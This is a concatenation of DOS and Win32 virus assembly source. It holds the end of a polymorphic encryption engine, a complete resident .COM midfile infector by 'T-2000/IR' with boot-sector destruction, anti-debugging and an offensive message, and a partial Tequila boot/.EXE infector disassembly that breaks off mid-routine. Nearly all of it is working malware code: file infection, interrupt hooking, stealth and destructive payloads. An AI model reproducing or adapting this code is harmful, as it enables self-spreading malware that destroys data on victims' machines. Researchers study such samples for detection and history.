xchg al,ah
stosw
;----------------

call gengarbage

;-XOR REG3,REG1-- ;make a xor reg3,reg1 reg1=key


mov al,dl
shl al,3
or al,cl
add al,0c0h
mov ah,33h
xchg al,ah
stosw
;----------------

call gengarbage

mov al,dl

;-MOV [REG2],REG3 ;make a mov [reg2],reg3 reg2=offset code


shl al,3
or al,ch
mov ah,089h
xchg al,ah
stosw
;----------------

call gengarbage

;-ADD REG2,4----- ;adds 4 to the offset register


mov al,83h
stosb
mov ax,004c0h
add al,ch
stosw
;----------------

call gengarbage

;---DEC REG4----- ;decreases counter reg4 (size)


mov al,dh
add al,048h
stosb
;----------------

mov eax,9c66h ;pushf


stosw

call gengarbage

inc ah ;popf
stosw

;---JZ OVER------
mov ax,074h
stosw
push edi
;----------------

mov eax,edi ;can't generate > 80h-5 bytes of garbage


regenerate: ;between JZ beh - poly - JMP - beh: code...
mov edi,eax ;restore EDI for ja

call gengarbage

mov edx,edi
sub edx,eax
cmp edx,080h-5 ;80h = max JZ distance, 5 is size of JMP BACK
ja regenerate

;----JMP BACK----
sub esi,edi
mov al,0e9h
stosb
mov eax,0fffffffbh
add eax,esi
stosd
;----------------

;----PATCH JZ----
pop esi ;esi-1 = jz value

mov eax,edi
sub eax,esi
mov byte ptr [esi-1],al

;----------------

call gengarbage

;----POPAD-------
mov al,61h ;popad
stosb
;----------------

call gengarbage

;----PATCH LEA---
pop esi ;patch LEA reg1,[EAX+startofcrypted]
push edi
sub edi,offset viruscopy-start
sub edi,ebp
mov dword ptr [esi+2],edi
pop edi
;----------------

mov ecx,virusz/4 ;copy encrypted virus code after poly


mov esi,ebp ;decryptors
cryptit:
lodsd
xor eax,ebx
stosd
loop cryptit

sub edi,offset viruscopy-start


sub edi,ebp
mov ecx,edi ;virus size + poly in ECX

pop edi
pop esi
pop edx
pop ebx
pop eax
ret

;----------------------------------------------------------------------------;
; Generates lot of rnd instructions which look good but do nothing
; (they undo themself indirect)
;----------------------------------------------------------------------------;

gengarbage:
push eax
push ebx
push ecx
push edx
push esi

garbageloop:

call get_rnd32

and al,1111b

cmp al,1
je genadd ;OK

cmp al,2
je gensub ;OK

cmp al,3
je genxor ;OK

cmp al,4
je genmov ;OK

cmp al,5
je genpush ;OK

cmp al,6
je geninc ;OK
cmp al,7
je gendec ;OK

cmp al,8
je gencmp ;OK

cmp al,9
je genjunk ;OK

cmp al,0eh
jb garbageloop

exitgen:

pop esi
pop edx
pop ecx
pop ebx
pop eax

ret

;-----------------------------------------------------------------------------
; Generates random add
;-----------------------------------------------------------------------------
genadd:
call getrndal

cmp al,4
je genadd ;4 = esp, leave him alone

cmp ah,80h
jb addandsub ;generate an add - code - sub

and eax,111b

cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?


ja savetoadd ;yep

call pushregister

call gengarbage

call randomadd ;adds a value or register

call gengarbage

call popregister

jmp exitgen

savetoadd:
call randomadd

jmp exitgen

addandsub:
push eax

xchg al,ah
mov al,081h
add ah,0c0h
stosw
push eax

call get_rnd32
stosd
push eax

call gengarbage

pop ebx
pop eax

add ah,028h
stosw
mov eax,ebx
stosd

pop eax
jmp exitgen
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random sub
;-----------------------------------------------------------------------------
gensub:
call getrndal

cmp al,4
je gensub ;4 = esp, leave him alone

cmp ah,80h
jb subandadd ;generate an add - code - sub

and eax,111b

cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?


ja savetosub ;yep

call pushregister

call gengarbage

call randomsub ;adds a value or register

call gengarbage

call popregister

jmp exitgen

savetosub:

call randomsub

jmp exitgen

subandadd:

push eax

xchg al,ah
mov al,081h
add ah,0e8h
stosw
push eax

call get_rnd32
stosd
push eax

call gengarbage

pop ebx
pop eax

sub ah,028h
stosw
mov eax,ebx
stosd

pop eax

jmp exitgen
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random xor
;-----------------------------------------------------------------------------
genxor:
call getrndal

cmp al,4
je genxor

cmp ah,80h
jb genxorxor ;generate an xor - code - xor

and eax,111b

cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?


ja savetoxor ;yep

call pushregister ;first push

call gengarbage ;generate some garbage

call randomxor ;xors with a value or register

call gengarbage ;generate some garbage

call popregister ;and pop it

jmp exitgen

savetoxor:

call randomxor

jmp exitgen

genxorxor:
push eax

xchg al,ah
add ah,0f0h
mov al,081h

stosw
push eax

call get_rnd32
stosd
push eax

call gengarbage

pop ebx
pop eax

stosw

mov eax,ebx

stosd

pop eax
jmp exitgen

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random mov
;-----------------------------------------------------------------------------
genmov:
call getrndal

cmp al,4
je genmov

and eax,111b ; eax <- al

cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?


ja savetomov ;yep

call pushregister ;first push

call gengarbage ;generate some garbage

call randommov ;movs a value or register

call gengarbage ;generate some garbage

call popregister ;and pop it

jmp exitgen

savetomov:

call randommov

jmp exitgen
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random push
;-----------------------------------------------------------------------------
genpush:
call getrndal
cmp al,4
je genpush

and eax,111b

call pushregister

call gengarbage

call popregister

jmp exitgen
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random inc
;-----------------------------------------------------------------------------
geninc: ;40
call getrndal
cmp al,4
je geninc

cmp ah,80h
ja genincdec

and eax,111b

cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?


ja savetoinc

call pushregister

call gengarbage

add al,040h
stosb

call gengarbage

sub al,040h

call popregister

jmp exitgen

savetoinc:
add al,040h
stosb
jmp exitgen

genincdec:
add al,40h ;inc
stosb

call gengarbage

add al,8 ;dec


stosb

jmp exitgen

;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random dec
;-----------------------------------------------------------------------------
gendec: ;48
call getrndal
cmp al,4
je gendec

cmp ah,80h
ja gendecinc

and eax,111b

cmp byte ptr [ebp+offset pushtable+eax-start],0h ;is the reg. pushed?


ja savetodec

call pushregister

call gengarbage

add al,048h
stosb

call gengarbage

sub al,048h

call popregister

jmp exitgen

savetodec:
add al,048h
stosb
jmp exitgen

gendecinc:
add al,48h
stosb

call gengarbage

sub al,8h
stosb
jmp exitgen

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Pushes register in al
;-----------------------------------------------------------------------------
pushregister:
push eax

inc byte ptr [ebp+offset pushtable+eax-start] ;set flag for reg.

add al,050h
stosb

pop eax
ret
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Pops register in al
;-----------------------------------------------------------------------------
popregister:
push eax

dec byte ptr [ebp+offset pushtable+eax-start] ;unflag for reg.

add al,058h
stosb

pop eax
ret
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random add reg, value or add reg1,reg2 - reg = al
;-----------------------------------------------------------------------------
randomadd:
push eax

call get_rnd32

cmp al,80h
pop eax
push eax
ja addregreg

call randomaddvalue

rndaddb:
pop eax
ret

addregreg:
call randomaddreg
jmp rndaddb

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random add reg,value - reg = al
;-----------------------------------------------------------------------------

; 81 c0+reg value
; reg = eax 05 value

randomaddvalue:
push eax

or al,al ;reg = eax?


jz addeax ;special

xchg al,ah
mov al,081h
add ah,0c0h

stosw

backfromaddeax:
call get_rnd32

stosd

pop eax
ret

addeax:

mov al,05h
stosb
jmp backfromaddeax

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random add reg1,reg2 - reg1 = al
;-----------------------------------------------------------------------------
randomaddreg:
push eax

mov bl,al

call getrndal

shl bl,3

or al,bl ;mix instructions

add al,0c0h
mov ah,03h
xchg ah,al

stosw

pop eax
ret
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random sub reg, value or sub reg1,reg2 - reg = al
;-----------------------------------------------------------------------------
randomsub:

push eax

call get_rnd32

cmp al,80h
pop eax
push eax
ja subregreg

call randomsubvalue

rndsubb:
pop eax
ret

subregreg:
call randomsubreg
jmp rndsubb

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random sub reg,value - reg = al
;-----------------------------------------------------------------------------

; 81 c0+reg value
; reg = eax 05 value

randomsubvalue:
push eax

or al,al ;reg = eax?


jz subeax ;special

xchg al,ah
mov al,081h
add ah,0e8h

stosw

backfromsubeax:

call get_rnd32

stosd

pop eax
ret

subeax:

mov al,05h
stosb
jmp backfromsubeax

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates random sub reg1,reg2 - reg1 = al
;-----------------------------------------------------------------------------
randomsubreg:
push eax

mov bl,al

call getrndal

shl bl,3

or al,bl ;mix instructions

add al,0c0h
mov ah,03h
xchg ah,al

stosw

pop eax
ret
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates a xor reg, value or xor reg, reg2 - reg = al
;-----------------------------------------------------------------------------
randomxor:

push eax
call get_rnd32
cmp al,80h
pop eax
push eax
ja xorvalue

call randomxorreg

rndxorr:

pop eax
ret

xorvalue:

call randomxorvalue
jmp rndxorr
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates a random xor reg,reg2 - reg = al
;-----------------------------------------------------------------------------
randomxorreg:
push eax ;6633

mov bl,al

call getrndal

shl bl,3

or al,bl ;mix instructions

add al,0c0h
mov ah,033h

xchg ah,al

stosw

pop eax
ret
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates a random xor reg,value
;-----------------------------------------------------------------------------
randomxorvalue:
push eax

add al,0f0h
mov ah,081h

xchg al,ah

stosw

call get_rnd32

stosd

pop eax
ret
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; generates a random mov reg,value or reg,reg2
;-----------------------------------------------------------------------------
randommov:
push eax

cmp ah,080h
jb movreg

call randommovvalue

movback:

pop eax
ret

movreg:
call randommovreg
jmp movback
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generates a random mov reg,value
;-----------------------------------------------------------------------------
randommovvalue:
push eax

add al,0b8h

stosb

call get_rnd32

stosd

pop eax
ret

;-----------------------------------------------------------------------------
; generates a random mov reg,reg2
;-----------------------------------------------------------------------------
randommovreg: ;8b (c0+reg) or reg2
push eax
mov bl,al

call getrndal

shl bl,3
or al,bl ;mix instructions

xchg ah,al

mov al,08bh
add ah,0c0h

stosw

pop eax
ret

;-----------------------------------------------------------------------------
; generates a random cmp reg,reg2 or cmp reg,value
;-----------------------------------------------------------------------------
gencmp: ;39/3b
call get_rnd32

cmp ah,0c0h
jb gencmp

cmp al,80h
ja gencmpvalue

push eax

call get_rnd32
mov bh,039h
cmp al,80h
ja gencmp1
add bh,2
gencmp1:

pop eax

mov al,bh

cld
stosw
jmp exitgen

gencmpvalue: ;81f8

and eax,0111b
add ax,081f8h

xchg al,ah

stosw

call get_rnd32

stosd
jmp exitgen

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
; Generate junk f8 - fd
;-----------------------------------------------------------------------------
genjunk:
call get_rnd32
cmp al,0f8h
jb genjunk
cmp al,0fdh
ja genjunk

stosb

jmp exitgen
;-----------------------------------------------------------------------------

getrndal:
call get_rnd32
and al,111b
ret

rdtcs equ <dw 310Fh>

get_rnd32: ;main part by GriYo / 29A


push ecx
push ebx
push edx
push edi
push esi

mov eax,dword ptr [ebp+rnd32_seed-start]


mov ecx,eax
imul eax,41C64E6Dh
add eax,00003039h
mov dword ptr [ebp+rnd32_seed-start],eax

xchg eax,ecx
rdtcs ;just 4 some xtra randomness
xchg eax,ecx
xor eax,ecx

pop esi
pop edi
pop edx
pop ebx
pop ecx
ret

polyend:

db "(c)" ;just some junk

end:

;----------------------------------------------------------------------------;

pointertope dd ?

if debug eq 1
death dd ? ;kill ourself flag
endif
busy dd ?
filename db 100h dup (0h)
peheader db 1024 dup (0h)
whereappend dd ?
pushtable db 8 dup (0h)

viruscopy db (virusz+1000) dup (0h) ;virussize + poly

memend:

_CODE ends

;----------------------------------------------------------------------------;

;----------------------------------------------------------------------------;
_DATA segment dword use32 public 'DATA'
fill db ?
_DATA ends
_burp segment dword use32 public 'LiFEwiRE'
fill2 db ?
_burp ends
;----------------------------------------------------------------------------;

end start
end
; Resident .COM midfile infector - 666 bytes - 02/2000 by T-2000/IR.
; Uses the INT 21h ISR to locate a suitable place to put the CALL_Virus.

.286
.MODEL TINY
.CODE

Virus_Size EQU (End_Body-START)


Virus_Size_Mem EQU (((End_Heap-START)+15)/16)

START:
PUSHF ; Save registers.
PUSHA
PUSH DS
PUSH ES

CALL Get_IP

; Encrypted with XOR 66h:


; "If Jesus was fucked to death, all xtians would be wearing tiny dildo's"
; (pardon my sense of humour :)

Message DB 6Bh, 6Ch, 2Fh, 00h, 46h, 2Ch, 03h


DB 15h, 13h, 15h, 46h, 11h, 07h, 15h
DB 46h, 00h, 13h, 05h, 0Dh, 03h, 02h
DB 46h, 12h, 09h, 46h, 02h, 03h, 07h
DB 12h, 0Eh, 4Ah, 46h, 07h, 0Ah, 0Ah
DB 46h, 1Eh, 12h, 0Fh, 07h, 08h, 15h
DB 46h, 11h, 09h, 13h, 0Ah, 02h, 46h
DB 04h, 03h, 46h, 11h, 03h, 07h, 14h
DB 0Fh, 08h, 01h, 46h, 12h, 0Fh, 08h
DB 1Fh, 46h, 02h, 0Fh, 0Ah, 02h, 09h
DB 41h, 15h, 6Bh, 6Ch, 61h, 66h

Get_IP: POP SI ; Calculate delta offset.


SUB SI, (Message-START)

MOV AH, 30h ; Get DOS version.


INT 21h

CMP AL, 4 ; We need DOS 4.xx or above.


JB Restore_Host

MOV AX, 2000h ; Virus residency check.


INT 21h

XCHG CX, AX ; Already up there?


JCXZ Restore_Host ; Then abort further install.

MOV AH, 43h ; Soft-Ice residency check.


INT 68h

CMP AX, 0F386h ; Active?


JZ Trash_Boot

; (This works in Win32 aswell tho you have to encapsulate it


; with a SEH as the INT 68h will GPF if Soft-Ice ain't loaded).

Alloc_Memory: XOR CX, CX

Alloc_Block: MOV AH, 48h ; Attempt to allocate memory.


MOV BX, Virus_Size_Mem
INT 21h
JNC Init_Block

DEC CX ; CX = -1
JNP Restore_Host ; Endless loop?

MOV AH, 4Ah ; Get blocksize of ES.


MOV BX, CX
INT 21h

MOV AH, 4Ah ; Create room for the virus.


SUB BX, Virus_Size_Mem+1
INT 21h
JNC Alloc_Block

JMP Restore_Host ; And attempt allocation.

Init_Block: MOV ES, AX ; ES = allocated block.

DEC AX ; DS = MCB allocated block.


MOV DS, AX

XOR DI, DI

MOV WORD PTR DS:[DI+1], 8 ; Disguise block as system.

MOV CX, (Virus_Size/2) ; Copy viruscode up there.


SEGCS
REP MOVSW

PUSH ES

MOV AX, 3521h ; Get INT 21h.


INT 21h

PUSH ES
POP DS

MOV AX, 2566h ; Revector it to INT 66h.


MOV DX, BX
INT 21h

POP DS

MOV Busy_Switch, CL ; Clear busy flag.

MOV AL, 21h ; Hook INT 21h.


MOV DX, OFFSET New_Int21h
INT 21h

Restore_Host: PUSH SS ; So we can STOS to SS.


POP ES

MOV BP, SP ; Setup stack pointer.

MOV DI, [BP+(11*2)] ; CALL_Virus return address.

SUB DI, 3 ; Offset of CALL_Virus.

MOV [BP+(11*2)], DI ; Re-execute it later.

MOV AL, NOT 0C3h ; Encrypted original byte.


Host_Byte = BYTE PTR $-1
NOT AL ; Decrypt byte.
STOSB ; Restore byte in memory.

MOV AX, 9090h-1 ; Encrypted original word.


Host_Word = WORD PTR $-2
INC AX ; Decrypt word.
STOSW ; Restore word in memory.

POP ES ; Restore original registers.


POP DS
POPA
POPF

RETN ; And re-execute, fixed code.

Trash_Boot:
MOV AL, 2 ; Trash the bootsector of C:.
MOV CX, 1
XOR DX, DX
SEGCS ; Stupid anti-TBClean trick.
INT 26h

INT 19h ; Reboot the system.

New_Int21h:
CMP AX, 2000h ; Virus residency call.
JNE Check_Exit

CBW ; AX = 0.

IRET ; And return.

Check_Exit: PUSHA ; Save all regs.


PUSH DS
PUSH ES

OR AH, AH ; Program terminate?


JZ Check_Timer

CMP AH, 4Ch ; Program terminate?


JNE Check_Debugger

Check_Timer: IN AX, 40h ; Get a random value.

ADD AL, AH ; 1/256 chance of displaying


JNZ Check_Debugger ; text message.

MOV AH, 0Eh


MOV SI, OFFSET Message

Display_Char: SEGCS ; Fetch next encrypted byte.


LODSB

XOR AL, 66h ; Displayed all so far?


JZ Check_Debugger ; Then bail.

INT 10h ; BIOS display character.

JMP Display_Char ; Go on.

Check_Debugger: XOR DI, DI


MOV DS, DI ; Get 1st instruction of
LDS SI, DS:[DI+(01h*4)] ; INT 01h.
LODSB

MOV AH, AL ; Save it in AH.

MOV DS, DI ; Get 1st instruction of


LDS SI, DS:[DI+(03h*4)] ; INT 03h.
LODSB

XOR AX, 0CFCFh ; if they're not IRET then


JNZ Trash_Boot ; a debugger has hooked them.

Check_Caller: INT 01h ; Annoying break.

JMP $ ; Bail if we're busy already.


Busy_Switch = BYTE PTR $-1

INC CS:Int_Count ; Only examine INTs randomly


JS Exit_ISR ; to prevent slowdowns.
JP Exit_ISR

MOV BP, SP
MOV DS, [BP+(11*2)] ; DS = CS of calling INT 21h.

XCHG SI, AX ; SI = 0.

CMP DS:[SI], 20CDh ; Verify it's a .COM-PSP.


JNE Exit_ISR

; Set the busy flag so we don't get interrupted.

MOV CS:Busy_Switch, (Exit_ISR-Busy_Switch)-1

MOV AH, 62h ; Get current PSP.


INT 66h

CMP BX, [BP+(11*2)] ; Caller's CS == PSP ?


JNE Clear_Busy ; Else it ain't no .COM.

IN AX, 40h ; Get a random number.


ADD AL, AH

CMP AL, 150 ; Infect the program here?


JNB Clear_Busy ; Nope, maybe next time.

MOV DS, DS:[SI+2Ch] ; .COM's environment block.

Scan_For_Name: LODSW ; Scan for the end of all


DEC SI ; settings, after which
; the full path to the
OR AX, AX ; currently executing program
JNZ Scan_For_Name ; resides.

CALL Infect_File

Clear_Busy: AND CS:Busy_Switch, 0 ; Open for business again..

Exit_ISR: POP ES ; Restore the regs.


POP DS
POPA

Do_Old_Int21h: INT 66h ; Call the original INT 21h.


RETF 2 ; And return with new flags.

Seek_EOF:
MOV AX, 4202h ; Seek to the end of file.
XOR CX, CX
CWD
INT 66h

DB 0CDh, 03h ; Annoying break.

Do_RETN: RETN

Infect_File:
MOV AX, 4300h ; Get file's attributes.
LEA DX, [SI+3]
INT 66h
JC Do_RETN

IN AL, 21h ; Lock the keyboard.


OR AL, 00000010b
OUT 21h, AL

INT 01h ; Hang the possible debugger.

PUSH DS ; Save path and attributes.


PUSH DX
PUSH CX

AND CL, 00000110b ; Leave system & hidden files


JZ Clear_Readonly ; alone (and clear r/o bit).

JMP_Nop_Attr: JMP Nop_Attr_Rest ; Fix stack but don't restore


; attributes.

Clear_Readonly: MOV AX, 4301h ; Clear possible r/o bit.


INT 66h
JC JMP_Nop_Attr

MOV AX, 3D02h ; Open file for read/write.


INT 66h
JNC Save_Handle

JMP Restore_Attr

Save_Handle: XCHG BX, AX ; Save filehandle in BX.

PUSH CS
POP DS

MOV SI, OFFSET Header

MOV AH, 3Fh ; Read first 4 bytes of .COM.


MOV CL, 4
MOV DX, SI
INT 66h
JNC Verify_Read

JMP_Close_File: JMP Close_File

Verify_Read: CMP AX, CX ; All 4 bytes we're read?


JNE JMP_Close_File

CALL Seek_EOF ; Get filesize.

DEC DX ; .COM is over 64k ?


JNS JMP_Close_File ; Then bail, obviously.

CMP AX, (63*1024) ; .COM is too big?


JA JMP_Close_File

CMP AX, (4*1024) ; Or too small?


JB JMP_Close_File

INC WORD PTR [SI+2] ; Don't infect .SYS-files.


JZ JMP_Close_File

CMP [SI], 'ZM'+1 ; Ditto for .EXE-files.


JE JMP_Close_File

CMP [SI], 'MZ'+1


JE JMP_Close_File

MOV AX, 4202h ; Seek to the last 7 bytes


DEC CX ; of the .COM-file, this
MOV DL, -7 ; is where the possible
INT 66h ; ENUNS-string is located.

; My Win98 .COM-files have the ENUNS changed to NLDNS, so just


; checking for ENUNS would not work with these. Just treath every
; .COM-file as a ENUNS protected file and you're all set.

MOV AH, 3Fh


MOV CX, 7
MOV DX, OFFSET Checksum_ID
INT 66h

; Adjust the file's checksum.

ADD Checksum_Word, Virus_Size

CALL Seek_EOF

LES DI, [BP+(2*10)] ; ES:DI = CS:IP of the next


; instruction in the target.

MOV DX, DI
DEC DH ; Minus PSP (100h).

CMP DX, AX ; IP points into the image?


JNB JMP_Close_File ; Else bail out.

SUB AX, DX ; Calculate displacement.


SUB AX, 3

MOV BP, OFFSET CALL_Virus

MOV CS:[BP+1], AX ; CALL_Virus displacement.

PUSH DX

MOV AX, 4200h ; Seek to the insert offset.


XOR CX, CX
INT 66h
MOV SI, OFFSET Header

MOV AH, 3Fh ; Read the original bytes.


MOV CL, 3
MOV DX, SI
INT 66h

POP DX

CMPSB ; Code in memory is the same


JNE Close_File ; as on disk?

CMPSW ; This avoids infecting


JNE Close_File ; packed files, etc.

SUB SI, 3

LODSB ; Get 1st byte, encrypt and


NOT AL ; save it.
MOV Host_Byte, AL

LODSW ; Do the same with the next


DEC AX ; word.
MOV Host_Word, AX

MOV AX, 4200h ; Seek to the insert offset


XOR CX, CX ; again.
INT 66h

MOV AX, 5700h ; Get file's date & time.


INT 66h
JC Close_File

MOV AL, CL ; Mask-out seconds.


AND AL, 00011111b

CMP AL, (6/2) ; 6 seconds (infected) ?


JE Close_File ; Then abort.

XCHG CX, AX ; Put CX in AX.

AND AL, 11100000b ; Clear seconds field.


OR AL, (6/2) ; Set 6 seconds.

PUSH AX ; Save the file date & time


PUSH DX ; on the stack for later.

MOV AH, 40h ; Write the CALL_Virus into


MOV CX, 3 ; the file.
MOV DX, BP
INT 66h
JC Restore_Date

CALL Seek_EOF

MOV AH, 40h ; Append virusbody to the


MOV CX, Virus_Size ; target file. (DX=0).
INT 66h

Restore_Date: MOV AX, 5701h ; Restore file date & time.


POP DX
POP CX
INT 66h

Close_File: MOV AH, 3Eh ; Close the file.


INT 66h

Restore_Attr: MOV AX, 4301h ; Restore file's attributes.


CMP AX, 0
ORG $-2
Nop_Attr_Rest: MOV AH, 19h ; Nop (get current drive).
POP CX
POP DX
POP DS
INT 66h

Exit_Infect: CMP AX, 545Bh ; Executable text string,


XOR CH, [BX] ; '=[T2/IR]='. Very effective
DEC CX ; against lame text patching.
PUSH DX
POP BP
CMP AX, 0DEADh

IN AL, 21h ; Reverse state of keyboard,


XOR AL, 00000010b ; it'll lock if a debugger
OUT 21h, AL ; has skipped the 1st lock.

INT 03h ; Hang the possible debugger.

RETN

CALL_Virus DB 0E8h ; CALL opcode.


DW 0

Checksum_ID DB 5 DUP(0) ; Usually 'ENUNS'.


Checksum_Word DW 666 ; Checksum itself.

End_Body:

Int_Count DB 0
Header DB 4 DUP(0)

End_Heap: ; So it's lame.. a lame virus for a lame person..


; Haven't bothered optimizing the code structure to
; the max, no time nor desire, sorry.. Remember, this
; is just a demonstration virus....

; Amen.

END START
; Tequila.2468.A (exact) disasm.
; Multipartite semi-stealth polymorphic MBS & .EXE-infector.
; Bugs marked with '***'.
; T-2000/IR, March 2000.

.MODEL TINY
.STACK 512
.CODE

Virus_Size EQU (End_Body-START)


Virus_Size_512 EQU ((End_Body-START)+511)/512
Virus_Size_1024 EQU ((End_Body-START)+1023)/1024
Virus_Size_Mem EQU ((End_Heap-START)+15)/16

START:

Host_IP DW OFFSET Carrier


Host_CS DW (256/16)
Host_SS DW (256/16)

Infect_Year DW 0 ; Year of MBS infection.


Infect_MD DW 0 ; Month & day of MBS infection.

Tunnel_Success DB 0 ; DOS' INT 13h found boolean.

Word_16 DW 16 ; Used for MUL/DIV operations.


Word_512 DW 512
Word_250 DW 250
Byte_12 DB 12

Message DB 0Dh, 0Ah, 0Dh, 0Ah


DB 'Welcome to T.TEQUILA''s latest production.', 0Dh, 0Ah
DB 'Contact T.TEQUILA/P.o.Box 543/6312 St''hausen/Switzerland.', 0Dh, 0Ah
DB 'Loving thoughts to L.I.N.D.A', 0Dh, 0Ah, 0Dh, 0Ah
DB 'BEER and TEQUILA forever !', 0Dh, 0Ah, 0Dh, 0Ah, '$'

Hint DB 'Execute: mov ax, FE03 / int 21. Key to go on!'

; Tequila's activation routine, it's supposed to activate on the same day


; as the MBS infection took place, 3 or more months later, when it will
; draw a colorful mandelbrot set consisting out of ASCII characters, and
; display a message.

Check_Activate:
PUSH BP
MOV BP, SP

SUB SP, (6*2) ; Reserve 12 bytes on the


; stack.
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH ES
PUSH DS

PUSH CS
POP DS

MOV AX, Infect_Year ; Year of MBS infection.


INC AX ; Skip all further checks?
JZ JMP_Exit_Act ; Yep.

DEC AX ; We're in countdown mode?


JNZ Check_Date ; Nope.

DEC Infect_MD ; 3 program exits so far?


JNZ JMP_Exit_Act ; Else bug out.

JMP Init_Video_Seg ; Do the effect.

Check_Date: MOV AH, 2Ah ; Get the current date.


CALL Do_Old_Int21h

MOV SI, CX ; SI = year count.

MOV CX, Infect_MD

CMP CL, DL ; Same day as infection?


JNE Disable_Check

MOV AX, SI ; AX = current year count.

SUB AX, Infect_Year ; Minus the year count of


; MBS infection.

MUL Byte_12 ; Calculate total count of


; months in year count.

ADD AL, DH ; Plus current month.


; AL = amount of months since
; MBS infection took place.

ADD CH, 3 ; Infection date + 3 months.

CMP AL, CH ; 3 months have passed?


JAE Enable_Call ; Then enable the payload.

Disable_Check: MOV Infect_Year, -1 ; Don't check the date


JMP JMP_Exit_Act ; anymore.

Enable_Call: MOV Infect_Year, 0 ; Signal that the payload


; can activate and the 0FE03h
; call can be accepted.

MOV Infect_MD, 3 ; Countdown timer, wait 3


; program exits before
; activation.
JMP_Exit_Act: JMP Exit_Activate

Init_Video_Seg: MOV BX, 0B800h ; VGA video segment.

INT 11h ; Get equipment status.

AND AX, 0000000000110000b ; Mask out video state.

CMP AX, 0000000000110000b ; 80x25 monochrome?


JNE Set_Video_Seg

MOV BX, 0B000h ; Monochrome video segment.

Set_Video_Seg: MOV ES, BX


; I didn't bother commenting the effect as I don't have a clue of what the
; fuck it's doing. Besides, graphical payloads are for lamers anyways....

XOR BX, BX

MOV DI, 0FD8Fh

LOC_9: MOV SI, 0FC18h

LOC_10: MOV [BP-(1*2)], SI


MOV [BP-(2*2)], DI

MOV CX, 30

LOCLOOP_11: MOV AX,[BP-(1*2)]


IMUL AX ; dx:ax = reg * ax

MOV [BP-(4*2)], AX
MOV [BP-(3*2)], DX

MOV AX, [BP-(2*2)]


IMUL AX ; dx:ax = reg * ax

MOV [BP-(6*2)], AX
MOV [BP-(5*2)], DX

ADD AX, [BP-(4*2)]


ADC DX, [BP-(3*2)]

CMP DX, 15
JAE LOC_12

MOV AX, [BP-(1*2)]


IMUL WORD PTR [BP-(2*2)] ; dx:ax = data * ax
IDIV Word_250 ; ax,dxrem=dx:ax/data

ADD AX, DI
MOV [BP-(2*2)], AX

MOV AX, [BP-(4*2)]


MOV DX, [BP-(3*2)]

SUB AX, [BP-(6*2)]


SBB DX, [BP-(5*2)]
IDIV Word_512

ADD AX, SI
MOV [BP-(1*2)], AX

LOOP LOCLOOP_11

LOC_12: INC CX
SHR CL, 1

MOV CH, CL
MOV CL, 0DBh
MOV ES:[BX], CX

INC BX
INC BX

ADD SI, 18
CMP SI, 1B8h
JL LOC_10

ADD DI, 52

CMP DI, 2A3h


JL LOC_9

XOR DI, DI ; Display the hint on screen.


MOV SI, OFFSET Hint
MOV CX, (Check_Activate-Hint)
CLD

Write_Char: MOVSB ; Put a byte in video RAM.


INC DI ; Don't change the attribute.

LOOP Write_Char ; Do the entire string.

XOR AX, AX ; Wait for a keypress.


INT 16h

Exit_Activate: POP DS
POP ES
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX

MOV SP, BP
POP BP

RETN

; This displays Tequila's message.


Display_Message:
PUSH DX
PUSH DS

PUSH CS
POP DS

MOV AH, 09h ; Display string.


MOV DX, OFFSET Message
CALL Do_Old_Int21h

POP DS
POP DX

RETN

; This get's inserted into MBS'ses.


MBS_Loader:
CLI

XOR BX, BX ; Zero DS.


MOV DS, BX

MOV SS, BX ; Setup a stack.


MOV SP, 7C00h
STI

XOR DI, DI

; Steal 3k of DOS memory to go resident into.

SUB WORD PTR DS:[413h], Virus_Size_1024


INT 12h

MOV CL, 6 ; Calculate segment to go


SHL AX, CL ; resident into.

MOV ES, AX ; Push relocated address.


PUSH ES

MOV AX, OFFSET Relocated_Boot


PUSH AX

; Read the virusbody off disk.

MOV AX, 0200h+Virus_Size_512


MOV CX, DS:[7C00h+(Home_ST-MBS_Loader)]
INC CX
MOV DX, DS:[7C00h+(Home_HD-MBS_Loader)]
INT 13h

RETF ; Jump to the relocated code.

ID_Word DW 0FE02h ; Already-infected-tag.

Home_ST DW 0 ; Sector/track of virusbody.


Home_HD DW 0 ; Head/drive of virusbody.

Relocated_Boot: PUSH CS
POP DS

XOR AX, AX ; Zero ES.


MOV ES, AX

MOV BX, 7C00h

PUSH ES ; ES:BX = 0000:7C00, boot


PUSH BX ; address.

MOV AX, 0201h ; Read the original MBS from


MOV CX, Home_ST ; disk.
MOV DX, Home_HD
INT 13h

PUSH CS
POP ES

; Create a copy of the INT 13h ISR, and the


; body encryptor & appender, as the virus will
; encrypt the runtime code when it infects a file
; so it doesn't have to use a seperate buffer.

CLD
MOV SI, OFFSET New_Int13h
MOV DI, OFFSET New_Int13h_Copy
MOV CX, (New_Int1Ch-New_Int13h)
REP MOVSB
MOV SI, OFFSET Append_Body_Encrypted
